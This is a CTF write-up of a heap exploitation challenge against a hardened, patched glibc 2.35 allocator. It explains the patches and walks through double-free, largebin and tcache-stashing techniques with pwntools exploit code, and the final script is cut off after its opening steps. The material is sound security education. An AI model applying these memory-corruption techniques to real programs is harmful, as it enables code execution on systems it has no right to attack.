locked room

Introduction

locked_room was a difficult heap challenge from this CTF, where the gimmick was that the libc was patched with multiple security mitigations. I didn't solve it during this CTF (rip), but I did get close, and managed to solve it the next day. Anyways, let the madness begin.

Reversing

As expected, we have full protections on the main binary, cos why not.

The binary itself also isn't too interesting, just a simple heap note with alloc, free and view:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>

#define BUF_SIZE 20
#define MAX_ALLOCS 100

typedef struct Alloc {
    unsigned char * data;
    uint64_t len;
} Alloc;

Alloc allocs[MAX_ALLOCS];
int current_index = 0;

void menu() {
    write(1, "1. Alloc\n", 9);
    write(1, "2. Free\n", 8);
    write(1, "3. View\n", 8);
    write(1, "4. Exit\n", 8);
}

void alloc_chunk() {
    char buf[BUF_SIZE];
    unsigned int size = 0;
    if (current_index >= MAX_ALLOCS) {
        write(1, "Out of space!\n", 14);
        return;
    }
    write(1, "Size?\n> ", 8);
    read(0, buf, BUF_SIZE);
    size = strtoul(buf, NULL, 10);
    if (size > 0x800) {
        write(1, "Too big!\n", 9);
        return;
    }
    allocs[current_index].data = malloc(size);
    allocs[current_index].len = 0;

    write(1, "Data?\n> ", 8);
    size_t amt_read = read(0, allocs[current_index].data, size);
    if (amt_read > 0) {
        allocs[current_index].len = amt_read;
    }

    current_index++;
    write(1, "Done!\n", 6);
}

void free_chunk() {
    char buf[BUF_SIZE];
    unsigned int i = 0;
    write(1, "Index?\n> ", 9);
    read(0, buf, BUF_SIZE);
    i = strtoul(buf, NULL, 10);
    if (i < MAX_ALLOCS) {
        free(allocs[i].data);
        allocs[i].len = 0;
    } else {
        write(1, "Invalid index!\n", 15);
        return;
    }
    write(1, "Done!\n", 6);
}

void view_chunk() {
    char buf[BUF_SIZE];
    unsigned int i = 0;
    write(1, "Index?\n> ", 9);
    read(0, buf, BUF_SIZE);
    i = strtoul(buf, NULL, 10);
    if (i < MAX_ALLOCS && allocs[i].data != NULL && allocs[i].len > 0) {
        write(1, allocs[i].data, allocs[i].len);
    } else {
        write(1, "Invalid index!\n", 15);
    }
}

int main() {
    char buf[BUF_SIZE];
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);

    write(1, "You're in a locked room. Can you escape?\n", 41);
    write(1, "I'll say it in red: \x1B[31mIn this room, you can only malloc and free. Your goal is to escape and reach the flag.\x1B[0m\n", 116);
    write(1, "I'll say it in blue: \x1B[36mWith the hardened allocator, it is impossible to escape! You will be stuck here forever!\x1B[0m\n", 119);

    while (1) {
        menu();
        write(1, "> ", 2);
        unsigned long choice = 0;
        read(0, buf, BUF_SIZE);
        choice = strtoul(buf, NULL, 10);
        switch (choice) {
            case 1:
                alloc_chunk();
                break;
            case 2:
                free_chunk();
                break;
            case 3:
                view_chunk();
                break;
            case 4:
                write(1, "\x1B[31mYou are incompetent!\x1B[0m\n", 30);
            default:
                _exit(0);
        }
    }
    return 0;
}

Emphasis on simple: a common pattern in this binary, and the challenge as a whole, is that barebones functions like read, write and _exit are used instead of stdio functions and exit, which have complexity that can be attacked and manipulated. This reduces our options for RCE :(

Double free

The bug isn't too hard to spot: when a chunk is freed, its .len field is nulled, but not the pointer itself, and since there's no check in free_chunk for .len == 0, nothing stops us from freeing a chunk twice!
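
Using the malloc/free handlers defined later in the writeup, the bug boils down to the following (note that a naive double free like this is still caught by glibc's own tcache key check, so the rest of the exploit is about getting around that):

a = malloc(0x18)   # allocs[0].data = ptr, .len = amount read
free(a)            # allocs[0].len = 0, but allocs[0].data still holds ptr
free(a)            # i < MAX_ALLOCS still passes, so ptr is freed a second time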

Libc patches

Well, nothing in the program at least. The interesting part of the challenge comes from the libc.patch file we're given, which patches the code under malloc/ in the glibc source (version 2.35).

PREV_FAST_FREED

+/* size field is or'ed with PREV_FAST_FREED when previous adjacent chunk
+  is a freed fastbin chunk. */
+#define PREV_FAST_FREED 0x8

Firstly, it introduces a new bit flag to put in the size fields of chunks. The idea is to track which chunks have been freed to a fastbin, similarly to how PREV_INUSE works for the unsortedbin/smallbins/largebins, so that double frees (and other fastbin corruption) can be detected more reliably, as the existing sanity checks are easy to bypass.
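
For reference, a quick sketch of the flag bits that can now live in a size field (the first three are standard glibc, the last one is added by the patch); since chunks here are 16-byte aligned, masking off the low four bits recovers the real size:

PREV_INUSE      = 0x1
IS_MMAPPED      = 0x2
NON_MAIN_ARENA  = 0x4
PREV_FAST_FREED = 0x8    # new in libc.patch

real_size = lambda size_field: size_field & ~0xf
hex(real_size(0x299))    # '0x290' (PREV_INUSE | PREV_FAST_FREED set)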

It also doubles as an anti-debugging measure, as vis_heap_chunks struggles when faced with this flag >:(

tcache = fastbin

@@ -3196,6 +3208,10 @@ tcache_get (size_t tc_idx)
   tcache->entries[tc_idx] = REVEAL_PTR (e->next);
   --(tcache->counts[tc_idx]);
   e->key = 0;
+  e->next = NULL;
+  if (__glibc_unlikely(csize2tidx (chunksize (mem2chunk (e)))) != tc_idx) {
+    malloc_printerr ("malloc(): memory corruption (tcache)");
+  }
   return (void *) e;

RIP tcache, you will be missed, as it now has the same check for a valid size field that fastbin does. This, along with the requirement that tcache (and fastbin) chunks are 16-byte aligned (so no misaligned size tricks), basically kills tcache as an easy win.
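
To spell the new check out, csize2tidx is roughly the following (MINSIZE = 0x20, MALLOC_ALIGNMENT = 0x10), so a poisoned entry only survives tcache_get if the memory it points at has a size field matching the bin it supposedly came from:

def csize2tidx(csize):
    return (csize - 0x20 + 0xf) // 0x10

csize2tidx(0x20)     # 0  -> tcache[0x20]
csize2tidx(0x290)    # 39 -> tcache[0x290]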

no escape?

@@ -3311,24 +3329,34 @@ __libc_malloc (size_t bytes)
       && tcache->counts[tc_idx] > 0)
     {
       victim = tcache_get (tc_idx);
+      mchunkptr victim_chunk = mem2chunk (victim);
+      ar_ptr = arena_for_chunk (victim_chunk);
+      max_address = (char *) (ar_ptr->top) + chunksize (ar_ptr->top);
+      min_address = max_address - ar_ptr->system_mem;
+      assert (((char *) victim_chunk) >= min_address);
+      assert (((char *) victim_chunk + chunksize (victim_chunk)) <= ((char *) (ar_ptr->top)));
       return tag_new_usable (victim);
     }
   DIAG_POP_NEEDS_COMMENT;
 #endif
 
-  if (SINGLE_THREAD_P)
-    {
-      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
-      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
-	      &main_arena == arena_for_chunk (mem2chunk (victim)));
-      return victim;
-    }
+  victim = tag_new_usable (_int_malloc (&main_arena, bytes));
+  mchunkptr victim_chunk = mem2chunk (victim);
+  ar_ptr = arena_for_chunk (victim_chunk);
+  max_address = (char *) (ar_ptr->top) + chunksize (ar_ptr->top);
+  min_address = max_address - ar_ptr->system_mem;
+  assert (!victim || chunk_is_mmapped (victim_chunk) ||
+    &main_arena == arena_for_chunk (victim_chunk));
+  assert (((char *) victim_chunk) >= min_address &&
+    ((char *) victim_chunk + chunksize (victim_chunk)) <= ((char *) (ar_ptr->top)));
+  return victim;

This is arguably the most annoying change, which restricts where our allocations can be.

Maximum address is top + chunksize(top), which points to the end of the (allocated) heap region, and the minimum address is the maximum minus av->system_mem, which is the total amount of memory currently allocated for that region, so the minimum would be the start of the region.
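
With some made-up numbers (not from the actual challenge), the check works out like this:

top         = 0x55555555b000            # av->top
top_size    = 0x20000                   # chunksize(av->top)
system_mem  = 0x21000                   # av->system_mem
max_address = top + top_size            # 0x55555557b000, end of the heap
min_address = max_address - system_mem  # 0x55555555a000, start of the heap
# every chunk handed back by tcache_get()/_int_malloc() must now satisfy
# min_address <= chunk  and  chunk + chunksize(chunk) <= av->top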

It also prevents the end of our chunk coming after the top chunk, so no overlapping chunks with the top chunk to corrupt it, or allocating past it.

These checks seem to be adapted from do_check_chunk, and thankfully they only used those, cos the full debug checks are 💀

No IO for you

@@ -298,13 +298,10 @@ static void
  __malloc_assert (const char *assertion, const char *file, unsigned int line,
 		 const char *function)
 {
-  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
-		     __progname, __progname[0] ? ": " : "",
-		     file, line,
-		     function ? function : "", function ? ": " : "",
-		     assertion);
-  fflush (stderr);
-  abort ();
+  write(2, "Assertion failed.\n", 18);
+  write(2, assertion, strlen(assertion));
+  write(2, "\n", 1);
+  _exit(-1);

Like I mentioned earlier, a pattern here is using barebones functions to reduce the attack surface for RCE, so now we can't attack stderr or printf either.

One interesting thing to note here, though, is that there's a call to strlen, which, when used inside libc, goes through libc's own PLT and GOT, as it can resolve to different architecture-specific implementations like SSE2 or AVX2.

Since we're using glibc 2.35, libc GOT is still writable (due to Partial RELRO), so this could be an avenue for code execution (however it's not what I used).

Other changes

There are a few more, smaller changes, such as:

  • Nulling more leftover pointers in malloc.

  • Only recognising main_arena: arena_for_chunk always returns &main_arena. (For this reason, when I refer to av, this will be the same as main_arena).

Patching source

One thing that you may find helpful when doing this challenge is to have a patched copy of the source to refer to: it helps with reading the new code, and gdb will also recognise malloc.c so you can debug malloc and free with source listings. Just copy the malloc/malloc.c and malloc/arena.c files to your system, then do:

$ patch -p2 -i ../libc.patch
patching file arena.c
patching file malloc.c

Exploitation

So it looks like we've got our work cut out for us here. Let's start off easy, and write our handlers and get our leaks:

Handlers

send_choice = lambda c: p.sendlineafter(b"> ", str(c).encode())

current_index = 0
def malloc(size, data=None):
    if data is None:
        data = b"X"
    global current_index
    send_choice(1)
    p.sendlineafter(b"Size?\n> ", str(size).encode())
    p.sendafter(b"Data?\n> ", data)
    current_index += 1
    return current_index-1

def free(i):
    send_choice(2)
    p.sendlineafter(b"Index?\n> ", str(i).encode())

def view(i):
    send_choice(3)
    p.sendlineafter(b"Index?\n> ", str(i).encode())
    return p.recvuntil(b"1. Alloc\n", drop=True)

Leaking libc and heap

alloc_chunk sets a chunk's .len to the number of bytes actually read, so no OOB reads, and .len is nulled on free, so no straightforward read-after-free either (plus the patch nulls leftover pointers during malloc).

Fortunately we can use the UAF to overlap chunks to get leak. The basic idea is:

  1. Allocate a chunk a, then free it.

  2. Reallocate it with another chunk b, setting b.len to a suitable length.

  3. With UAF, free a again. Since a = b, we have UAF on b!

  4. Now use b to read the freed chunk.

I opted to use a large chunk bordering the top chunk, effectively UAFing the top chunk, then any allocation would overlap with the UAFed one.

# leaking libc
uaf = malloc(0x800)
free(uaf)

i = malloc(0x800, b"A"*8)
malloc(8)

free(uaf)
libc_leak = u64(view(i))
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - (libc.sym.main_arena+96)
log.info(f"libc: {hex(libc.address)}")

# leaking heap: PROTECT_PTR(0, heap+0xXXX)
i = malloc(0x18, b"A"*8)
free(uaf)
heap_leak = u64(view(i))
log.info(f"heap leak: {hex(heap_leak)}")

heap = heap_leak << 12
log.info(f"heap: {hex(heap)}")

Control tcache_perthread_struct

A useful tool for solving heap challenges is tcache_perthread_struct, a goldmine for arbitrary writes, and it will be useful here too (even if it's only on the heap for now).

The problem is, to get initial corruption we only have a double free, and in this version of libc, double frees are heavily mitigated: tcache can't be double freed without a write after free, and the doubly linked list bins like unsortedbin also have measures. Normally we could use the fastbin double free trick, but now we have PREV_FAST_FREED, so ideally we want to find a way to clear that bit.

Thankfully the patch isn't completely thorough in its enforcement of PREV_FAST_FREED. Looking through the patch for references to setting PREV_FAST_FREED, we can notice that there are some places where it's left out.

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4369
victim = av->top;
size = chunksize (victim);

if (__glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): corrupted top size");

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
  {
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
  }

For example, the above snippet is untouched by the patch, and is for when an allocation is serviced from the top chunk. victim is the chunk that will be allocated and returned to the user, and we can see that it will have the PREV_INUSE bit set, and maybe the NON_MAIN_ARENA bit, but no reference to PREV_FAST_FREED.

In other words, if the top chunk has PREV_FAST_FREED set, allocating from it won't preserve the bit.

So now we have a plan for a double free on fastbin:

  1. Allocate 2 chunks a and b, such that b borders the top chunk.

  2. Free b to fastbin. This sets top chunk's PREV_FAST_FREED.

  3. Allocate from top chunk to clear PREV_FAST_FREED.

  4. Free a then b.

Chunk a is still needed to avoid the other double free protection, where it checks that the fastbin chunk being freed isn't at the top of fastbin.

We can then use this to get an allocation on the heap to poison the fd pointer of a tcache[0x290] chunk, and point that to heap_base+0x10, and now we control all tcache allocations!

class TcachePerthreadStruct:
    def __init__(self):
        self.counts = [0]*64
        self.pointers = [0]*64
    def set_count(self, size, count):
        idx = (size - 0x20) // 16
        self.counts[idx] = count
    def set_pointer(self, size, pointer):
        idx = (size - 0x20) // 16
        self.pointers[idx] = pointer
    def set(self, size, pointer, count=1):
        self.set_pointer(size, pointer)
        self.set_count(size, count)
    def __bytes__(self):
        output = b""
        for count in self.counts:
            output += p16(count)
        for pointer in self.pointers:
            output += p64(pointer)
        return output

tcache1 = malloc(0x288, flat({0x278: 0x21}))
tcache2 = malloc(0x288)

tcache = [malloc(0x18) for _ in range(7)]
fast1 = malloc(0x18)
fast2 = malloc(0x18)

# fill tcache[0x20]
for i in tcache:
    free(i)

# free fastbin chunk next to top chunk
# so that av->top has PREV_FAST_FREED
free(fast2)

# allocate from top chunk to clear PREV_FAST_FREED
malloc(0x28)

# double free fast2
free(fast1)
free(fast2)

# alloc back tcache[0x20]
for _ in range(7):
    malloc(0x18)

# corrupt fastbin[0x20] to point to just before a tcache[0x290] chunk
malloc(0x18, p64(protect(heap + 0xd50, heap+0x1000)))

# bring arb pointer to head of fastbin[0x20]
malloc(0x18)
malloc(0x18)

# free 2 tcache[0x290] chunks
free(tcache1)
free(tcache2)

# poison tcache[0x290] -> tcache_perthread_struct
malloc(0x18, flat({0x08: 0x291, 0x10: protect(heap+0x10, heap+0xd50)}))

tcache = TcachePerthreadStruct()
tcache.set(0x290, heap+0x10)
malloc(0x288)
malloc(0x288, bytes(tcache))

Note that since we don't have an edit function, if we need to change tcache_perthread_struct later, we'll need to allocate on it again.

We can do that by always keeping tcache[0x290] pointed at heap+0x10, i.e. including it in every write.
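
Something like this hypothetical wrapper (the final exploit just inlines it each time) captures the pattern:

def write_tcache(tc):
    # re-point tcache[0x290] at tcache_perthread_struct itself, so the next
    # malloc(0x288) lands back on it and we can write to it again later
    tc.set(0x290, heap + 0x10)
    return malloc(0x288, bytes(tc))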

Now what?

We can now corrupt the heap to our liking .... so what?

We still have the tcache size and min/max address restrictions in play, so we can't aim our tcache allocations anywhere interesting. Ideally we'd want to corrupt the main_arena->top and main_arena->system_mem fields to adjust the min/max addresses, and open up our arbitrary allocation possibilities, but how do we do that without allocating onto them???

Largebin attack -> Large Memory

Just because we can't allocate outside the heap doesn't mean we can't write anything outside it! Introducing the largebin attack, which can be used to write a heap address anywhere in memory, while only allocating inside the heap. While a heap address isn't too versatile, as in we can't write any libc addresses or code pointers, it's still useful, because what we can do is aim it at main_arena->system_mem to increase the range!

how2heap has a useful demo of this attack, but this is a brief overview of how to do it against some address target:

  1. Pick a largebin to use, such as 0x400-0x430.

  2. Allocate 2 chunks a and b belonging to this largebin, where b is smaller than a (and separated from each other and top chunk).

  3. Free a to the unsortedbin.

  4. Allocate a chunk larger than a to send a to largebin[0x400-0x430].

  5. Free b to unsortedbin.

  6. Overwrite a->bk_nextsize to target-0x20.

  7. Allocate a chunk larger than a (and b).

This will write the address of b to target, which in our case is main_arena->system_mem! While this only decreases the minimum address for now, it's a useful first step, and sets up future attacks 👀
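
As a rough sketch (mirroring step 5 of the final exploit; a_addr and target stand in for the address of chunk a and for main_arena->system_mem, and the overwrite of a's metadata is done through an overlapping chunk courtesy of the tcache_perthread_struct control from earlier):

a = malloc(0x728); malloc(0x18)    # chunk a + guard
b = malloc(0x718); malloc(0x18)    # chunk b (smaller, same largebin) + guard

free(a)                            # a -> unsortedbin
malloc(0x738)                      # bigger request: a gets sorted into the largebin
free(b)                            # b -> unsortedbin

# rewrite a's header via an overlapping chunk: fd/bk/fd_nextsize point back at a,
# bk_nextsize points at target-0x20
malloc(0xf8, p64(0) + p64(0x731) + p64(a_addr)*3 + p64(target - 0x20))
malloc(0x738)                      # sorting b writes &b into *target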

One important thing to note about overwriting main_arena->system_mem is that we don't want to make it too large. If it's much greater than av->top, then the calculation:

min_address = (top + chunksize(top)) - system_mem

will underflow and become "negative"; since the comparisons are unsigned, min_address will be VERY large, and none of our allocations will pass the checks.
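
For example, with made-up numbers:

end        = 0x55555557b000    # top + chunksize(top)
system_mem = 0x7ffff7a00000    # a "too large" value landing in av->system_mem
min_addr   = (end - system_mem) % 2**64
hex(min_addr)                  # '0xffffd5555db7b000' -> no allocation can pass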

Overwriting av->top

So far we can shrink min_address, but (for now) this is only useful for maybe allocating on the binary's writable area. However given:

  • The protections of locked_room, like FULL RELRO.

  • The lack of an edit function, meaning we can't just overwrite pointers for an easy arbitrary write (would work for arbitrary read though).

  • The lack of a PIE leak.

This isn't much of a viable option. While we could overwrite the size of the top chunk to increase the max_address, this wouldn't be very helpful as the ends of our chunks, and thus the chunks themselves, can't be after the top chunk. And even though our system_mem is large now, we can't do a house of force since our allocation sizes are capped at 0x800. So we'd need to overwrite av->top to a greater address.

The largebin attack can only write heap addresses (and ones lower than av->top for that matter). While we could misalign the largebin attack, such as writing it to &av->top + 1 to make it much larger, we still need av->top to be a valid address, as malloc needs to be able to read chunksize(av->top).

So ideally we'd want to be able to write a libc or stack address, depending on the route for RCE you take, but how can we do that?

One way could be allocating somewhere before &av->top and overwriting av->top, but that just shifts the problem to:

  1. How to increase av->top enough to come after &av->top.

  2. How to write a fake size field before &av->top (for a tcache/fastbin allocation).

struct malloc_state
{
// ...
  mfastbinptr fastbinsY[NFASTBINS];
  mchunkptr top;
  mchunkptr last_remainder;
  mchunkptr bins[NBINS * 2 - 2];
// ...
};

An attack that would have worked well for the 1st problem was the unsorted bin attack, which was like the largebin attack, except it could write a libc address instead. And not just any libc address, but one that came from &av->bins, which comes after &av->top. Unfortunately, that attack has long since been patched out.

Shame too, because there's actually a relatively simple solution to the 2nd problem. As you can see above in struct malloc_state, the fastbin array is right before ->top, and since we can easily corrupt fastbins (using our tcache writes), we could bring any pointer to the head of a fastbin, but that could also be any value, such as a fake size field for a fake tcache chunk. Of course we couldn't allocate from this fastbin, and largebin allocations would fail because malloc_consolidate() would attempt to dereference this, but who actually cares?
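
For later reference, here are the main_arena offsets (glibc 2.35, from the struct above) that the exploit ends up caring about:

# offsets into main_arena
fastbinsY  = 16      # fastbinsY[0]; the fake tcache size field later lives in one of these slots
top        = 96      # main_arena->top
bins       = 112     # bins[0]; the bin_at(i) "chunk" starts at bins + (i-1)*0x10 - 0x10
system_mem = 2184    # main_arena->system_mem, target of the first largebin attack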

Tcache stashing on av->top

Thankfully there is another attack which solves the 1st problem, this time involving smallbins and tcache, which can be used similarly to a largebin attack, but allows us to write a libc address instead. But how?

The mechanism responsible for this involves moving smallbin chunks to tcache (i.e. stashing them in tcache). This is triggered in _int_malloc, specifically in the initial case where it's allocating from a smallbin:

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901
if (in_smallbin_range (nb))
  {
    idx = smallbin_index (nb);
    bin = bin_at (av, idx);

    if ((victim = last (bin)) != bin)
      {
        bck = victim->bk;
        if (__glibc_unlikely (bck->fd != victim))
          malloc_printerr ("malloc(): smallbin double linked list corrupted");
        set_inuse_bit_at_offset (victim, nb);
        bin->bk = bck;
        bck->fd = bin;

If the smallbin (for the size nb) is non-empty, it unlinks the last chunk (bin->bk) and returns it. But before returning, it will then check if there are other smallbin chunks that could be linked into the tcachebin of that same size.

https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3919
/* While we're here, if we see other chunks of the same size,
    stash them in the tcache.  */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
  {
    mchunkptr tc_victim;

    /* While bin not empty and tcache not full, copy chunks over.  */
    while (tcache->counts[tc_idx] < mp_.tcache_count
           && (tc_victim = last (bin)) != bin)
      {
        if (tc_victim != 0)
          {
            bck = tc_victim->bk;
            set_inuse_bit_at_offset (tc_victim, nb);
            if (av != &main_arena)
            set_non_main_arena (tc_victim);
            bin->bk = bck;
            bck->fd = bin;

            tcache_put (tc_victim, tc_idx);
          }
      }
  }

Now it iterates through the smallbin until either it's empty, or the tcache is full (this part is important), unlinking smallbin chunks the same way it was before, then adding the chunks to the tcache.

Interestingly, the check bck->fd != victim is absent in the loop, so nothing really stops us overwriting a ->bk field in one of these tc_victim chunks, to control bck. If we did that, then it would reach the line bck->fd = bin, and would write the address of the smallbin (which is located in main_arena) to bck+0x10!

One issue to deal with is what happens after this?

Since bin->bk = bck; is also triggered, we have last(bin) = bck, so we go to that chunk next in the loop, where we may face problems (depending on what our bck was).

This is where that tcache being full check comes into play. While it will believe there's more from the smallbin, if the tc_victim (with the malicious bck) was the 7th chunk for that tcache bin (i.e. tcache is now full), then it will terminate, and not do anything more with the bck.

We can use this to overwrite target=&av->top with a libc address as follows:

  1. Allocate 8 smallbin-sized chunks (again, separated from each other and the top chunk)

  2. Fill tcache of the same size.

  3. Free those 8 chunks (to unsortedbin).

  4. Allocate a bigger chunk to send them all to smallbin.

  5. Overwrite the ->bk field of the last freed smallbin chunk to target-0x10. This will be the last chunk used in the loop (i.e. bin->fd).

  6. Allocate a chunk of the same smallbin size.

The last allocated chunk will be serviced by the first freed smallbin chunk (bin->bk), and then the remaining 7 smallbin chunks are sent to tcache, while also writing to av->top!
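
In pointer terms, for that 7th and final tc_victim (the one whose bk we overwrote):

#   bck     = tc_victim->bk  = target - 0x10
#   bck->fd = *(bck + 0x10)  = *target          <- gets written with `bin`
# and `bin` is &smallbin[nb] inside main_arena, i.e. a libc address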

By the time av->top points into libc, we need av->system_mem to be large enough that min_address is below the heap, so we can still allocate within the heap region (0x7f... - 0x55... ≈ 0x2a...).

This will (of course) corrupt the smallbin used, so ideally we'd want to avoid using this smallbin for allocations, which can be done using larger chunks, or tcache. I originally found out about this technique (and tcache stashing in general) from a writeup from LA CTF.

Fixing av->top

This will have a small (or rather, large) issue. See, when av->top points into av->bins, while we have solved the problem of our allocations coming before av->top, we run into another issue: the top chunk size.

The .bins array is initially set up so that for every bin index i:

bin = av->bins[i]
assert (bin->fd == bin->bk == bin)

The way this is done is by having the fd and bk pointers point -0x10 back, so the bin->prev_size and bin->size overlap with the previous bin's fd and bk pointers.

This means that chunksize(av->top) will be the previous smallbin's bk pointer, by default a libc address, and because av->system_mem is a heap address, min_address will be too large for the main_arena allocation (0x7f... + 0x7f... - 0x55... ≈ 0xa9...).

While we could lower that bk pointer to a heap address by having chunks freed to that smallbin, so that the main_arena allocation could still work, we need to keep in mind how the tcache stashing write works. When we trigger the actual write, we allocate a smallbin chunk back on the heap, so when av->top is overwritten, it will then check if that heap chunk is valid, which it won't be due to the top chunk size.

So we need to lower that even further. For this, we can use another largebin attack! While it does only write a heap address, we can actually misalign this write by -2 so that the top 2 null bytes of the address overwrite the greatest 2 bytes of the bk pointer. This will shrink it to a 32 bit integer (from 48 bits), which is plenty small enough for that min_address calculation to be below the heap region.
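
With hypothetical values:

bk  = 0x00007ffff7a19ce0    # smallbin[0xa0].bk, originally a libc address
val = 0x000055555555c290    # heap address written by the largebin attack
# writing the 8-byte val at (&bk - 2) replaces bk's bytes 0..5 with val's bytes 2..7,
# so bk becomes val >> 16 = 0x55555555: small enough to act as a sane top chunk size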

This will need to be done before the tcache stashing attack, and will completely corrupt the previous smallbin, but again, who actually cares.

Leaking stack

Now that we can, in theory, setup the conditions for an allocation onto main_arena and overwrite av->top, we need to decide what we want to target.

The avenue I went down was the classic "overwrite the return address", but for that we're gonna need a stack leak. But how? Even if we could allocate on/near something like environ or __libc_argv, view only lets us read data we've sent ourselves (due to how .len is set), so allocating there wouldn't actually let us read what's already stored in those variables, only overwrite it.

So it seems the only way to get a data leak is to bring the data to us (i.e. into one of our chunks), rather than bringing our chunks to the data, which is similar to what we did when leaking libc and heap. Thankfully, we can use our good ol' friend tcache stashing to do this.

The idea is we can "link" a stack address into a smallbin by pointing a bk pointer to it, then when the tcache stashing occurs, the stack address is the last tc_victim, and will be put into the head of the tcachebin (i.e. into tcache_perthread_struct), and since we control the allocation over tcache_perthread_struct, we can then view it to leak the stack.

So the key difference between the setup here and before is that we use 2 fewer smallbin chunks (8 -> 6), and we point bk to target-0x18, where target contains a stack address. This results in target-0x18 being the 6th chunk linked into tcache, and then its bk pointer (our stack address) is the 7th and final tc_victim. And of course, since the tcache is full after linking the stack address into it, the loop terminates.

Skipping past canaries

Allocating on the stack will be made more difficult by the existence of canaries, as we don't have a good way of leaking them. Like I mentioned earlier, the view function makes leaking data with allocations difficult, and we can't use the tcache stashing trick to leak them as they need to be a writable address.

Canary slots do get rewritten all the time, so maybe you could overwrite one with an allocation and let the real value come back later, but something would return in the meantime and detect the stack smashing.

main has a canary that doesn't get used, but also wouldn't be replaced, so no leak there. And since it doesn't return, the main target is alloc_chunk. So if we can't leak it, can we skip it?

Well we don't have any candidates for a tcache/fastbin allocation, but interestingly we don't actually need those: we can use av->top.

av->top doesn't have the alignment restrictions that tcache/fastbin chunks do, and as long as chunksize(av->top) <= av->system_mem (the house of force mitigation check) then the top chunk size is considered valid. So we can actually just use the PIE address after the canary as a top chunk size, as av->system_mem is now a heap address, and thus will always be bigger (you could also misalign the size to make it smaller, as it's followed by a 0).

Largebin cleanup

Once we have av->top pointing into main_arena, before we fully control av->top using the tcache allocation, a useful preparation step is allocating from av->top to overwrite the bins array to clean up the largebins. Largebins being corrupted from the largebin attacks does cause us problems when allocating from the top chunk.

Firstly, if our allocations are smaller than the largebin chunks, they will be serviced using those (through remaindering), and not the top chunk. And we can't just empty largebins, as they're corrupted. So if we use chunks larger than the largebins, we bypass this, so we're fine, right?

Not quite, because once we set up the tcache write into main_arena, the fastbin array is corrupted, and thus any large allocations will fail due to malloc_consolidate, so we wouldn't be able to allocate larger than largebins to bypass them.

This is a simple fix, it just requires fixing the pointers in av->bins:

main_arena = b""
for i in range(0, 0x440, 0x10):
    main_arena += p64(libc.sym.main_arena + 256+i)*2
malloc(0x800, main_arena)

Putting it all together

Now we (finally) have all the components for an exploit, so let's put it together:

  1. Use double free to overlap chunks with a freed chunk, for heap and libc leaks.

  2. Get a double free on fastbins by clearing PREV_FAST_FREED with a top chunk allocation, and use it to poison the fastbin.

  3. Use this fastbin to poison tcache[0x290] to allocate onto tcache_perthread_struct for infinite writes.

  4. Allocate chunks necessary for:

    1. Putting fake tcache size into the fastbin array, specifically fastbin[0x70] (size chosen for alignment reasons).

    2. The 2 largebin attacks.

    3. The 2 tcache stashing attacks.

  5. Perform largebin attack against main_arena->system_mem first to decrease min_address enough to be able to still do heap allocations once av->top has been controlled.

  6. Perform largebin attack against main_arena+262 (using larger sizes than for the previous one to avoid reallocation), which is a misaligned write on smallbin[0xa0] to setup top chunk size for later.

  7. Do tcache stashing to leak __libc_argv for a stack leak.

  8. Do tcache stashing against main_arena->top using smallbin[0xb0], which writes the address of &smallbin[0xa0] to main_arena->top (which has the fake top chunk size).

  9. Do an allocation larger than (corrupted) largebins to allocate from the new av->top to clean up the largebins.

  10. Put fake tcache size into the fastbin array (this must be done after all the largebin allocations to avoid malloc_consolidate)

  11. Allocate on main_arena using tcache to overwrite main_arena->top to point to our target on the stack.

  12. Use smallbin-sized allocation to allocate on the stack using top chunk, overwrite the return address to get ROP!

Exploit

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('./locked_room_patched')
libc = ELF('./libc.so', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
if args.REMOTE:
    ip, port = "dicec.tf", 32019
    conn = lambda: remote(ip, port)
else:
    conn = lambda: e.process()

send_choice = lambda c: p.sendlineafter(b"> ", str(c).encode())
protect = lambda p, addr: p ^ (addr >> 12)

current_index = 0
def malloc(size, data=None):
    if data is None:
        data = b"X"
    global current_index
    send_choice(1)
    p.sendlineafter(b"Size?\n> ", str(size).encode())
    p.sendafter(b"Data?\n> ", data)
    current_index += 1
    return current_index-1

def free(i):
    send_choice(2)
    p.sendlineafter(b"Index?\n> ", str(i).encode())

def view(i):
    send_choice(3)
    p.sendlineafter(b"Index?\n> ", str(i).encode())
    return p.recvuntil(b"1. Alloc\n", drop=True)

p = conn()

### 1. leaking libc and heap

# libc leak
uaf = malloc(0x800)
free(uaf)

i = malloc(0x800, b"A"*8)
malloc(8)

free(uaf)
libc_leak = u64(view(i))
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - (libc.sym.main_arena+96)
log.info(f"libc: {hex(libc.address)}")

# heap leak
i = malloc(0x18, b"A"*8)
free(uaf)
heap_leak = u64(view(i))
log.info(f"heap leak: {hex(heap_leak)}")

heap = heap_leak << 12
log.info(f"heap: {hex(heap)}")

# cleanup
malloc(0x18)
malloc(0x7e8)

class TcachePerthreadStruct:
    def __init__(self):
        self.counts = [0]*64
        self.pointers = [0]*64
    def set_count(self, size, count):
        idx = (size - 0x20) // 16
        self.counts[idx] = count
    def set_pointer(self, size, pointer):
        idx = (size - 0x20) // 16
        self.pointers[idx] = pointer
    def set(self, size, pointer, count=1):
        self.set_pointer(size, pointer)
        self.set_count(size, count)
    def __bytes__(self):
        output = b""
        for count in self.counts:
            output += p16(count)
        for pointer in self.pointers:
            output += p64(pointer)
        return output

### 2. double free fastbin[0x20]

tcache1 = malloc(0x288, flat({0x278: 0x21}))
